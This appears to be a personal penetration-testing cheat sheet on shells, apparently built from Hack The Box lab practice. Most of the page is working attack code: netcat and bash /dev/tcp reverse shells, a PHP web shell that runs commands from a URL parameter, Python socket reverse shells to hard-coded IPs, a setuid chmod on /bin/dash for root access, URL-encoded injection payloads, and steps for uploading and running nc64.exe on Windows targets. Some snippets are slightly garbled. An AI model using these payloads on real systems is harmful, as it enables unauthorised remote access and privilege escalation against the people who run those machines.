Shells

Broad Topic

Basics

Host: Setup the listener to catch the reverse shell
- nc -nvlp 1234
Target: Upload your reverse shell, navigate, execute, connect
- http://rhost/404.php
Example: BashedHTB sends a php reverse shell with wget

Easy Test Connect

nc -e /bin/bash $IP 4444
netcat -e /bin/bash $MyIP 4444
bash -i >& /dev/tcp/$MyIP/4444 0>&1

nc -nlvp 4444

PHP web shell

Upload this simple 'shell.php', and call it using parameter 'cmd=uname'
Consider, you might need to send 'shell.php3' to avoid the block/filter.
REF: PhpTricks, FtpHttpVuln

<?php
  system($_GET["cmd"]);
?>

Execute:
http://abc.so/upload/shell.php?cmd=uname -a

Python

#!/usr/bin/env python
import os
import sys
try: 
    #os.system('/usr/bin/touch /tmp/hello')              ...test
    #os.system('bash -i /dev/tcp/$MyIP/4444 0>&1')       ...reverse shell
    os.system('chmod 4755 /bin/dash')                    ...rootbash
except:
    sys.exit()

This worked for htb-bashed:
Root process auto-executes python scripts:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.15",5555))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

Script:
http://10.10.10.168:8080/

import socket,subprocess,os bs; 
socket.socket(socket.AF_INET,socket.SOCK_STREAM);
ns.connect(("10.10.15.30",51000));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")# 
HTTP/1.1



Bash Script/Shell (privesc)

#!/usr/bin/python
import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.52",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

By Burp

Readable:
/'\nimport socket,subprocess,os;\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\ns.connect((\"10.10.15.30\",51000));\nos.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);\nimport pty;\npty.spawn(\"/bin/bash\")#

Web-Encoded:
/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1

Browser

http://10.10.10.168:8080/'%0Aimport%20socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.15.30",51000))%3bos.dup2(s.fileno(),0)%3bos.dup2(s.fileno(),1)%3bos.dup2(s.fileno(),2)%3bimport%20pty%3bpty.spawn("/bin/bash")%23 HTTP/1.1
--Remember to include the HTTP/1.1

Bash Reverse

REF: ApacheJamesEmail

bash -i >& /dev/tcp/192.168.1.26/53 0>&1

payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'

Powershell Reverse

WindowsPrivEsc-Powershell

netcat

Create a python reverse shell
Listener #1: Share rshell with <
Listener #2: Wait for incoming
LFI: Execute nc to pickup rshell and execute it

rce > nc > python > nc/rshell

Python Reverse Shell
vim cmd  ..connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..send/share the file
nc -nvlp 1234         ..catch shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok pull file, python execute
connected!

Windows netcat

Windows Target might not have netcat
Download and send the nc64.exe (assuming they are using 64bit)
Execute your nc64.exe to send a ReverseShell back to yourself
Ex: DrupalPhpVuln

Download 64-bit netcat
nc64.exe: upload and execute

http://10.x.x.x/ippsec.php?fupload=nc64.exe
http://10.x.x.x/ippsec.php?fexec=nc64.exe -e cmd $MyIP 8081
nc -nvlp 8081

PreviousPowerShell Empire Nextrpc

Last updated 2 years ago

hashtagLinks

hashtagBasics

hashtagEasy Test Connect

hashtagPHP web shell

hashtagPython

hashtagBy Burp

hashtagBrowser

hashtagBash Reverse

hashtagPowershell Reverse

hashtagnetcat

hashtagWindows netcat

hashtag

Links

Basics

Easy Test Connect

PHP web shell

Python

By Burp

Browser

Bash Reverse

Powershell Reverse

netcat

Windows netcat